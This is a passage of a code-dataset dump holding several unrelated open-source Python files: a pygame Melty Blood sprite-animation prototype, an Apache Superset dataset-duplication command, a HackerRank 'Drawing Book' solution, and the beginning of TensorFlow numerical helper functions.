Akiha_03[2]=(\"aki17_002.png\")\n Akiha_03[3]=(\"aki17_003.png\")\n Akiha_03[4]=(\"aki17_004.png\")\n Akiha_03[5]=(\"aki17_005.png\")\n Akiha_03[6]=(\"aki17_006.png\")\n Akiha_03[7]=(\"aki17_007.png\")\n Akiha_03[8]=(\"aki17_008.png\")\n Akiha_03[9]=(\"aki17_009.png\")\n Akiha_03[10]=(\"aki17_010.png\")\n Akiha_03[11]=(\"aki17_011.png\")\n Akiha_03[12]=(\"aki17_012.png\")\n Akiha_03[13]=(\"aki17_013.png\")\n Akiha_03[14]=(\"aki17_014.png\")\n Akiha_03[15]=(\"aki17_015.png\")\n Akiha_03[16]=(\"aki17_016.png\")\n Akiha_03[17]=(\"aki17_017.png\")\n Akiha_03[18]=(\"aki17_018.png\")\n Akiha_03[19]=(\"aki17_019.png\")\n Akiha_03[20]=(\"aki17_020.png\")\n Akiha_03[21]=(\"aki17_021.png\")\n Akiha_03[22]=(\"aki17_022.png\")\n Akiha_03[23]=(\"aki17_023.png\")\n Akiha_03[24]=(\"aki17_024.png\")\n Akiha_03[25]=(\"aki17_025.png\")\n Akiha_03[26]=(\"aki17_026.png\")\n Akiha_03[27]=(\"aki17_027.png\")\n\n Akihar_03 = {} # animacion hacia arriba izquierda\n Akihar_03[0]=(\"aki17r_000.png\")\n Akihar_03[1]=(\"aki17r_001.png\")\n Akihar_03[2]=(\"aki17r_002.png\")\n Akihar_03[3]=(\"aki17r_003.png\")\n Akihar_03[4]=(\"aki17r_004.png\")\n Akihar_03[5]=(\"aki17r_005.png\")\n Akihar_03[6]=(\"aki17r_006.png\")\n Akihar_03[7]=(\"aki17r_007.png\")\n Akihar_03[8]=(\"aki17r_008.png\")\n Akihar_03[9]=(\"aki17r_009.png\")\n Akihar_03[10]=(\"aki17r_010.png\")\n Akihar_03[11]=(\"aki17r_011.png\")\n Akihar_03[12]=(\"aki17r_012.png\")\n Akihar_03[13]=(\"aki17r_013.png\")\n Akihar_03[14]=(\"aki17r_014.png\")\n Akihar_03[15]=(\"aki17r_015.png\")\n Akihar_03[16]=(\"aki17r_016.png\")\n Akihar_03[17]=(\"aki17r_017.png\")\n Akihar_03[18]=(\"aki17r_018.png\")\n Akihar_03[19]=(\"aki17r_019.png\")\n Akihar_03[20]=(\"aki17r_020.png\")\n Akihar_03[21]=(\"aki17r_021.png\")\n Akihar_03[22]=(\"aki17r_022.png\")\n Akihar_03[23]=(\"aki17r_023.png\")\n Akihar_03[24]=(\"aki17r_024.png\")\n Akihar_03[25]=(\"aki17r_025.png\")\n Akihar_03[26]=(\"aki17r_026.png\")\n Akihar_03[27]=(\"aki17r_027.png\")\n\n Akiha_04 = {} # light punch derecha\n Akiha_04[0]=(\"aki01_000.png\")\n Akiha_04[1]=(\"aki01_001.png\")\n Akiha_04[2]=(\"aki01_002.png\")\n Akiha_04[3]=(\"aki01_003.png\")\n Akiha_04[4]=(\"aki01_004.png\")\n Akiha_04[5]=(\"aki01_005.png\")\n \n Akihar_04 = {} # light punch izquierda\n Akihar_04[0]=(\"aki01r_000.png\")\n Akihar_04[1]=(\"aki01r_001.png\")\n Akihar_04[2]=(\"aki01r_002.png\")\n Akihar_04[3]=(\"aki01r_003.png\")\n Akihar_04[4]=(\"aki01r_004.png\")\n Akihar_04[5]=(\"aki01r_005.png\")\n\n Akiha_05 = {} # media punch derecha\n Akiha_05[0]=(\"aki38_000.png\")\n Akiha_05[1]=(\"aki38_001.png\")\n Akiha_05[2]=(\"aki38_002.png\")\n Akiha_05[3]=(\"aki38_003.png\")\n Akiha_05[4]=(\"aki38_004.png\")\n Akiha_05[5]=(\"aki38_005.png\")\n\n Akihar_05 = {} # media punch izquierda\n Akihar_05[0]=(\"aki38r_000.png\")\n Akihar_05[1]=(\"aki38r_001.png\")\n Akihar_05[2]=(\"aki38r_002.png\")\n Akihar_05[3]=(\"aki38r_003.png\")\n Akihar_05[4]=(\"aki38r_004.png\")\n Akihar_05[5]=(\"aki38r_005.png\")\n\n Akiha_06 = {} # high kick derecha \n Akiha_06[0]=(\"aki40_000.png\")\n Akiha_06[1]=(\"aki40_001.png\")\n Akiha_06[2]=(\"aki40_002.png\")\n Akiha_06[3]=(\"aki40_003.png\")\n Akiha_06[4]=(\"aki40_004.png\")\n Akiha_06[5]=(\"aki40_005.png\")\n Akiha_06[6]=(\"aki40_006.png\")\n Akiha_06[7]=(\"aki40_007.png\")\n Akiha_06[8]=(\"aki40_008.png\")\n Akiha_06[9]=(\"aki40_009.png\")\n Akiha_06[10]=(\"aki40_010.png\")\n\n Akihar_06 = {} # high kick izquierda \n Akihar_06[0]=(\"aki40r_000.png\")\n Akihar_06[1]=(\"aki40r_001.png\")\n Akihar_06[2]=(\"aki40r_002.png\")\n 
Akihar_06[3]=(\"aki40r_003.png\")\n Akihar_06[4]=(\"aki40r_004.png\")\n Akihar_06[5]=(\"aki40r_005.png\")\n Akihar_06[6]=(\"aki40r_006.png\")\n Akihar_06[7]=(\"aki40r_007.png\")\n Akihar_06[8]=(\"aki40r_008.png\")\n Akihar_06[9]=(\"aki40r_009.png\")\n Akihar_06[10]=(\"aki40r_010.png\")\n\n Akiha_07 = {} # animacion saltar arriba derecha\n Akiha_07[0]=(\"aki15_000.png\")\n Akiha_07[1]=(\"aki15_001.png\")\n Akiha_07[2]=(\"aki15_002.png\")\n Akiha_07[3]=(\"aki15_003.png\")\n Akiha_07[4]=(\"aki15_004.png\")\n Akiha_07[5]=(\"aki15_005.png\")\n Akiha_07[6]=(\"aki15_006.png\")\n Akiha_07[7]=(\"aki15_007.png\")\n Akiha_07[8]=(\"aki15_008.png\")\n Akiha_07[9]=(\"aki15_009.png\")\n Akiha_07[10]=(\"aki15_010.png\")\n Akiha_07[11]=(\"aki15_011.png\")\n Akiha_07[12]=(\"aki15_012.png\")\n Akiha_07[13]=(\"aki15_013.png\")\n Akiha_07[14]=(\"aki15_014.png\")\n Akiha_07[15]=(\"aki15_015.png\")\n Akiha_07[16]=(\"aki15_016.png\")\n Akiha_07[17]=(\"aki15_017.png\")\n Akiha_07[18]=(\"aki15_018.png\")\n Akiha_07[19]=(\"aki15_019.png\")\n Akiha_07[20]=(\"aki15_020.png\")\n Akiha_07[21]=(\"aki15_021.png\")\n Akiha_07[22]=(\"aki15_022.png\")\n Akiha_07[23]=(\"aki15_023.png\")\n\n Akihar_07 = {} # animacion saltar arriba izquierda\n Akihar_07[0]=(\"aki15r_000.png\")\n Akihar_07[1]=(\"aki15r_001.png\")\n Akihar_07[2]=(\"aki15r_002.png\")\n Akihar_07[3]=(\"aki15r_003.png\")\n Akihar_07[4]=(\"aki15r_004.png\")\n Akihar_07[5]=(\"aki15r_005.png\")\n Akihar_07[6]=(\"aki15r_006.png\")\n Akihar_07[7]=(\"aki15r_007.png\")\n Akihar_07[8]=(\"aki15r_008.png\")\n Akihar_07[9]=(\"aki15r_009.png\")\n Akihar_07[10]=(\"aki15r_010.png\")\n Akihar_07[11]=(\"aki15r_011.png\")\n Akihar_07[12]=(\"aki15r_012.png\")\n Akihar_07[13]=(\"aki15r_013.png\")\n Akihar_07[14]=(\"aki15r_014.png\")\n Akihar_07[15]=(\"aki15r_015.png\")\n Akihar_07[16]=(\"aki15r_016.png\")\n Akihar_07[17]=(\"aki15r_017.png\")\n Akihar_07[18]=(\"aki15r_018.png\")\n Akihar_07[19]=(\"aki15r_019.png\")\n Akihar_07[20]=(\"aki15r_020.png\")\n Akihar_07[21]=(\"aki15r_021.png\")\n Akihar_07[22]=(\"aki15r_022.png\")\n Akihar_07[23]=(\"aki15r_023.png\")\n\n Akiha_08 = {} # animacion burla derecha\n Akiha_08[0]=(\"aki93_000.png\")\n Akiha_08[1]=(\"aki93_001.png\")\n Akiha_08[2]=(\"aki93_002.png\")\n Akiha_08[3]=(\"aki93_003.png\")\n Akiha_08[4]=(\"aki93_004.png\")\n Akiha_08[5]=(\"aki93_005.png\")\n Akiha_08[6]=(\"aki93_006.png\")\n Akiha_08[7]=(\"aki93_007.png\")\n Akiha_08[8]=(\"aki93_008.png\")\n Akiha_08[9]=(\"aki93_009.png\")\n Akiha_08[10]=(\"aki93_010.png\")\n Akiha_08[11]=(\"aki93_011.png\")\n Akiha_08[12]=(\"aki93_012.png\")\n Akiha_08[13]=(\"aki93_013.png\")\n\n Akihar_08 = {} # animacion burla derecha\n Akihar_08[0]=(\"aki93r_000.png\")\n Akihar_08[1]=(\"aki93r_001.png\")\n Akihar_08[2]=(\"aki93r_002.png\")\n Akihar_08[3]=(\"aki93r_003.png\")\n Akihar_08[4]=(\"aki93r_004.png\")\n Akihar_08[5]=(\"aki93r_005.png\")\n Akihar_08[6]=(\"aki93r_006.png\")\n Akihar_08[7]=(\"aki93r_007.png\")\n Akihar_08[8]=(\"aki93r_008.png\")\n Akihar_08[9]=(\"aki93r_009.png\")\n Akihar_08[10]=(\"aki93r_010.png\")\n Akihar_08[11]=(\"aki93r_011.png\")\n Akihar_08[12]=(\"aki93r_012.png\")\n Akihar_08[13]=(\"aki93r_013.png\")\n\n while True:\n \n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if pygame.key.get_pressed()[K_RIGHT]:\n estado = 1\n pos = 0\n if pygame.key.get_pressed()[K_UP]:\n u = 0\n estado = 9 # salto hacia derecha\n \n elif pygame.key.get_pressed()[K_LEFT]:\n estado = 2\n pos = 1\n if pygame.key.get_pressed()[K_UP]:\n u = 0\n estado = 9 # salto hacia 
izquierda\n\n elif pygame.key.get_pressed()[K_DOWN]:\n estado = 3 # agacharse\n if pygame.key.get_pressed()[K_a]: #golpe bajo\n u = 0\n estado = 11\n \n elif pygame.key.get_pressed()[K_UP]:\n u = 0\n estado = 5 # saltar hacia arriba\n \n elif pygame.key.get_pressed()[K_a]:\n u = 0\n estado = 6 # light punch\n\n elif pygame.key.get_pressed()[K_s]:\n u = 0\n estado = 7 # media punch \n\n elif pygame.key.get_pressed()[K_d]:\n u = 0\n estado = 8 # high kick\n\n elif pygame.key.get_pressed()[K_g]:\n u = 0\n estado = 10 # burla\n\n \n if pygame.key.get_pressed()[K_ESCAPE]:\n pygame.quit()\n sys.exit()\n\n \n elif event.type == KEYUP:\n if estado == 3:\n v = 0\n estado = 4 # levantarse\n else:\n v = 0\n estado = 0\n \n \n \n \n if estado == 0 and pos == 0: # stand by derecha\n u = 0\n if v <= 11:\n akiha = pygame.image.load(Akiha_00[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time)\n v += 1\n if v > 11:\n v = 0\n\n if estado == 0 and pos == 1: # stand by izquierda\n u = 0\n if v <= 11:\n akiha = pygame.image.load(Akihar_00[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time)\n v += 1\n if v > 11:\n v = 0\n \n elif estado == 1: # caminar derecha\n u = 0\n akiha = pygame.image.load(Akiha_01[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_2)\n x += i\n v += 1\n if v > 13:\n v = 1\n \n elif estado == 2: # caminar izquierda\n u = 0\n akiha = pygame.image.load(Akihar_01[v]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_2)\n x -= i\n v += 1\n if v > 13:\n v = 1\n\n elif estado == 3 and pos == 0: # agacharse a la derecha\n if u < 5:\n akiha = pygame.image.load(Akiha_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n\n if u == 5:\n akiha = pygame.image.load(Akiha_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n \n \n\n \n elif estado == 3 and pos == 1: # agacharse a la izquierda\n if u < 5:\n akiha = pygame.image.load(Akihar_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n\n if u == 5:\n akiha = pygame.image.load(Akihar_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n \n \n \n\n\n elif estado == 4 and pos == 0: # levantarse a la derecha\n if u < 14:\n akiha = pygame.image.load(Akiha_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n \n\n elif estado == 4 and pos == 1: # levantarse a la izquierda\n if u < 14:\n akiha = pygame.image.load(Akihar_02[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 5 and pos == 0: # arriba a la derecha\n while u < 27:\n if u <= 4:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n if u <= 11:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n 
pygame.time.wait(time_3)\n u += 1\n y -= 15\n else:\n if u <= 18:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y += 15\n else:\n if u <27:\n akiha = pygame.image.load(Akiha_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n \n else:\n estado = 0\n\n elif estado == 5 and pos == 1: # arriba a la izquierda\n while u < 27:\n if u <= 4:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n if u <= 11:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y -= 15\n else:\n if u <= 18:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n y += 15\n else:\n if u <27:\n akiha = pygame.image.load(Akihar_03[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n \n elif estado == 6 and pos == 0: # light punch derecha \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akiha_04[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 6 and pos == 1: # light punch izquierda \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akihar_04[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n elif estado == 7 and pos == 0: # media punch derecha \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akiha_05[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 7 and pos == 1: # media punch izquierda \n while u < 5:\n if u < 5:\n akiha = pygame.image.load(Akihar_05[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n\n elif estado == 8 and pos == 0: # high kick derecha \n while u < 10:\n if u < 10:\n akiha = pygame.image.load(Akiha_06[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 8 and pos == 1: # high kick izquierda \n while u < 10:\n if u < 10:\n akiha = pygame.image.load(Akihar_06[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n estado = 0\n\n elif estado == 9 and pos == 0: # salto hacia la derecha \n while u < 23:\n if u < 3:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n if u < 7:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x += 15\n y -= 20\n else:\n if u < 13:\n akiha = 
pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x += 25\n else:\n if u < 17:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x += 15\n y += 20\n else:\n if u < 23:\n akiha = pygame.image.load(Akiha_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n estado = 0 \n\n\n elif estado == 9 and pos == 1: # salto hacia la izquierda \n while u < 23:\n if u < 3:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n if u < 7:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x -= 15\n y -= 20\n else:\n if u < 13:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x -= 25\n else:\n if u < 17:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n x -= 15\n y += 20\n else:\n if u < 23:\n akiha = pygame.image.load(Akihar_07[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n \n else:\n estado = 0\n \n elif estado == 10 and pos == 0: # Burla \n while u < 13:\n if u < 13:\n akiha = pygame.image.load(Akiha_08[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n pygame.time.wait(250)\n estado = 0\n\n elif estado == 10 and pos == 1: # Burla \n while u < 13:\n if u < 13:\n akiha = pygame.image.load(Akihar_08[u]).convert_alpha()\n screen.blit(fondo,(0,0))\n screen.blit(akiha, (x, y))\n pygame.display.flip()\n pygame.time.wait(time_3)\n u += 1\n else:\n pygame.time.wait(250)\n estado = 0\n\n \n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n \nif __name__== \"__main__\":\n main()\n \n \n","repo_name":"Mamorut/Melty_Blood_Arcade_Test","sub_path":"Melty_Blood_Test/Melty_Blood_Prueba_Terminada.py","file_name":"Melty_Blood_Prueba_Terminada.py","file_ext":"py","file_size_in_byte":28493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25165836605","text":"import logging\nfrom typing import Any\n\nfrom flask_appbuilder.models.sqla import Model\nfrom flask_babel import gettext as __\nfrom marshmallow import ValidationError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom superset.commands.base import BaseCommand, CreateMixin\nfrom superset.commands.dataset.exceptions import (\n DatasetDuplicateFailedError,\n DatasetExistsValidationError,\n DatasetInvalidError,\n DatasetNotFoundError,\n)\nfrom superset.commands.exceptions import DatasourceTypeInvalidError\nfrom superset.connectors.sqla.models import SqlaTable, SqlMetric, TableColumn\nfrom superset.daos.dataset import DatasetDAO\nfrom superset.daos.exceptions import DAOCreateFailedError\nfrom superset.errors import ErrorLevel, SupersetError, SupersetErrorType\nfrom superset.exceptions 
import SupersetErrorException\nfrom superset.extensions import db\nfrom superset.models.core import Database\nfrom superset.sql_parse import ParsedQuery\n\nlogger = logging.getLogger(__name__)\n\n\nclass DuplicateDatasetCommand(CreateMixin, BaseCommand):\n def __init__(self, data: dict[str, Any]) -> None:\n self._base_model: SqlaTable = SqlaTable()\n self._properties = data.copy()\n\n def run(self) -> Model:\n self.validate()\n try:\n database_id = self._base_model.database_id\n table_name = self._properties[\"table_name\"]\n owners = self._properties[\"owners\"]\n database = db.session.query(Database).get(database_id)\n if not database:\n raise SupersetErrorException(\n SupersetError(\n message=__(\"The database was not found.\"),\n error_type=SupersetErrorType.DATABASE_NOT_FOUND_ERROR,\n level=ErrorLevel.ERROR,\n ),\n status=404,\n )\n table = SqlaTable(table_name=table_name, owners=owners)\n table.database = database\n table.schema = self._base_model.schema\n table.template_params = self._base_model.template_params\n table.normalize_columns = self._base_model.normalize_columns\n table.always_filter_main_dttm = self._base_model.always_filter_main_dttm\n table.is_sqllab_view = True\n table.sql = ParsedQuery(self._base_model.sql).stripped()\n db.session.add(table)\n cols = []\n for config_ in self._base_model.columns:\n column_name = config_.column_name\n col = TableColumn(\n column_name=column_name,\n verbose_name=config_.verbose_name,\n expression=config_.expression,\n filterable=True,\n groupby=True,\n is_dttm=config_.is_dttm,\n type=config_.type,\n description=config_.description,\n )\n cols.append(col)\n table.columns = cols\n mets = []\n for config_ in self._base_model.metrics:\n metric_name = config_.metric_name\n met = SqlMetric(\n metric_name=metric_name,\n verbose_name=config_.verbose_name,\n expression=config_.expression,\n metric_type=config_.metric_type,\n description=config_.description,\n )\n mets.append(met)\n table.metrics = mets\n db.session.commit()\n except (SQLAlchemyError, DAOCreateFailedError) as ex:\n logger.warning(ex, exc_info=True)\n db.session.rollback()\n raise DatasetDuplicateFailedError() from ex\n return table\n\n def validate(self) -> None:\n exceptions: list[ValidationError] = []\n base_model_id = self._properties[\"base_model_id\"]\n duplicate_name = self._properties[\"table_name\"]\n\n base_model = DatasetDAO.find_by_id(base_model_id)\n if not base_model:\n exceptions.append(DatasetNotFoundError())\n else:\n self._base_model = base_model\n\n if self._base_model and self._base_model.kind != \"virtual\":\n exceptions.append(DatasourceTypeInvalidError())\n\n if DatasetDAO.find_one_or_none(table_name=duplicate_name):\n exceptions.append(DatasetExistsValidationError(table_name=duplicate_name))\n\n try:\n owners = self.populate_owners()\n self._properties[\"owners\"] = owners\n except ValidationError as ex:\n exceptions.append(ex)\n\n if exceptions:\n raise DatasetInvalidError(exceptions=exceptions)\n","repo_name":"apache/superset","sub_path":"superset/commands/dataset/duplicate.py","file_name":"duplicate.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"42620463749","text":"import sys\n\ndef solve(n, p):\n # Complete this function\n count=0\n a=1\n count1=0\n for i in range(1,n+1):\n if(a==i):\n \n if(i==p):\n count=0\n break\n if(i%2==0):\n count=count+1;\n if(i+1==p or i==p):\n break\n for j in range(n,n>0,-1):\n #print(j)\n if(n==p):\n count1=0\n 
if(n%2==0):\n \n if(j%2!=0):\n count1=count1+1\n if(j==p or j-1==p):\n break\n if(n%2!=0):\n if(j%2==0):\n \n count1=count1+1;\n if(j-1==p or j==p):\n \n break\n \n #print(count,count1)\n if(count1==count):\n return count\n if(count1>count):\n return count\n else:\n return count1\n \n \n \n\nn = int(input().strip())\np = int(input().strip())\nresult = solve(n, p)\nprint(result)\n","repo_name":"bhaskarkalahasthi/pythonprograms","sub_path":"Drawing Book alogrithm in hacker rank.py","file_name":"Drawing Book alogrithm in hacker rank.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43361085303","text":"import tensorflow as tf\nimport numpy as np\nfrom . import sparsematrix\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef safe_inverse_one(Lambda,numstab):\n return safe_inverse(Lambda[None],numstab)[0]\n\ndef symmetrize(Lambda):\n return .5*(Lambda+batch_transpose(Lambda))\n\ndef batch_transpose(Lambda):\n return tf.einsum('...ji->...ij',Lambda)\n\n@tf.function(autograph=False)\ndef clip_low_eigenvalues(Lambda,numstab):\n with tf.device('cpu'): # GPU eigenvalue stuff stills seem to be quite slow\n eigval,eigvec=tf.linalg.eigh(Lambda)\n eigval=tf.clip_by_value(eigval,numstab,float(np.inf))\n rez=tf.einsum('...jk,...lk,...k->...jl',eigvec,eigvec,eigval)\n rez = symmetrize(rez)\n return rez\n\n@tf.function(autograph=False)\ndef safe_inverse(Lambda,numstab):\n with tf.device('cpu'): # GPU eigenvalues still seem to be quite bad\n eigval,eigvec=tf.linalg.eigh(Lambda)\n eigval=tf.clip_by_value(eigval,numstab,float(np.inf))\n evalo = tf.linalg.diag(1.0/eigval)\n B = tf.einsum('ijk,ilk->ijl',evalo,eigvec)\n return tf.einsum('ijk,ikl->ijl',eigvec,B)\n\ndef tfify(vals,dtype=tf.float64):\n return {x:tf.convert_to_tensor(vals[x],dtype=dtype) for x in vals if (vals[x] is not None)}\n\ndef tf_variabilify(vals,dtype=tf.float64):\n return {x:tf.Variable(tf.convert_to_tensor(vals[x],dtype=dtype)) for x in vals if (vals[x] is not None)}\n\ndef tf_variabilify_one(vals,dtype=tf.float64):\n if vals is None:\n return None\n else:\n return tf.Variable(tf.convert_to_tensor(vals,dtype=dtype))\n\ndef pge_safe(x):\n switch=tf.abs(x)<.00001\n\n A=.25-0.020833333333333332*(x**2)\n B=tf.tanh(x/2)/(2*x)\n return tf.where(switch,A,B)\n\ndef batchup(Nr,batchsize):\n bins=np.r_[0:Nr:batchsize,Nr]\n batches=np.c_[bins[:-1],bins[1:]]\n return batches\n\ndef map_accum(fn,Nr,batchsize,rule):\n batches=batchup(Nr,batchsize)\n\n logger.debug(f\"mapcat {fn}: 0/{Nr}\")\n result=fn(batches[0,0],batches[0,1])\n assert isinstance(result,tuple),\"fn should return a tuple of tensors\"\n\n # initialize!\n if len(rule)==1:\n rule = rule * len(result)\n tas=[]\n for i,r in enumerate(result):\n if r is None:\n tas.append(None)\n elif rule[i]=='c':\n ta = tf.TensorArray(dtype=r.dtype,size=batches.shape[0],dynamic_size=False,\n infer_shape=False,element_shape=(None,)+r.shape[1:])\n ta = ta.write(0,r)\n tas.append(ta)\n elif rule[i]=='s':\n tas.append(r)\n else:\n raise Exception(f\"What is {rule[i]}?\")\n\n # the loop!\n for i in range(1,len(batches)):\n logger.debug(f\"mapcat {fn}: {batches[i,0]}/{Nr}\")\n for j,r in enumerate(fn(batches[i][0],batches[i][1])):\n if tas[0] is None:\n pass\n elif rule[j]=='c':\n tas[j]=tas[j].write(i,r)\n elif rule[j]=='s':\n tas[j]=tas[j]+r\n else:\n raise Exception(f\"What is {rule[j]}?\")\n\n # close out!\n rez=[]\n for i,r in enumerate(tas):\n if tas[0] is None:\n rez.append(None)\n elif 
rule[i]=='c':\n rez.append(r.concat())\n elif rule[i]=='s':\n rez.append(r)\n else:\n raise Exception(f\"What is {rule[j]}?\")\n\n return tuple(rez)\n\ndef map_cat_sparse(fn,Nr,batchsize,index_dtype=tf.int64):\n CURROW=0\n WIDTH=None\n\n def go(st,en):\n nonlocal CURROW,WIDTH\n g=fn(st,en)\n\n # check for consistant widths\n if WIDTH is None:\n WIDTH=g.shape[1]\n else:\n assert WIDTH==g.shape[1]\n\n rows_n_cols = tf.cast(tf.where(g),dtype=index_dtype)\n data=tf.gather_nd(g,rows_n_cols)\n rows=rows_n_cols[:,0]+st\n cols=rows_n_cols[:,1]\n\n return rows,cols,data\n rows,cols,data = map_accum(go,Nr,batchsize,'ccc')\n row_indptr = tf.searchsorted(rows,tf.range(0,Nr+1,dtype=rows.dtype))\n return sparsematrix.CSRMatrix(row_indptr,rows,cols,data,(Nr,WIDTH),rows.shape[0])\n\ndef log2cosho2_safe(x):\n '''\n returns log(2*(cosh(x/2))\n '''\n\n return tf.math.softplus(x) -0.5*x\n\ndef log2cosho2_unsafe(x):\n '''\n returns log(2*(cosh(x/2))\n '''\n\n return tf.math.log(2*tf.cosh(x/2))\n\ndef log_binom(a,b):\n '''\n result = log a! / (b! * (a-b)!)\n = log Gamma(a+1) - log Gamma(b+1) - log Gamma(a-b+1)\n '''\n\n return tf.math.lgamma(a+1) - tf.math.lgamma(b+1) - tf.math.lgamma(a-b+1)\n\n\ndef log_negativebinomial(X,C,theta):\n '''\n log NegativeBinomial(x; p=sigmoid(c), r= theta)\n '''\n\n xpt=X+theta\n binc = tf.reduce_sum(log_binom(xpt-1,X))\n cosh_term = tf.reduce_sum(log2cosho2_safe(C)*xpt)\n xmh_term = 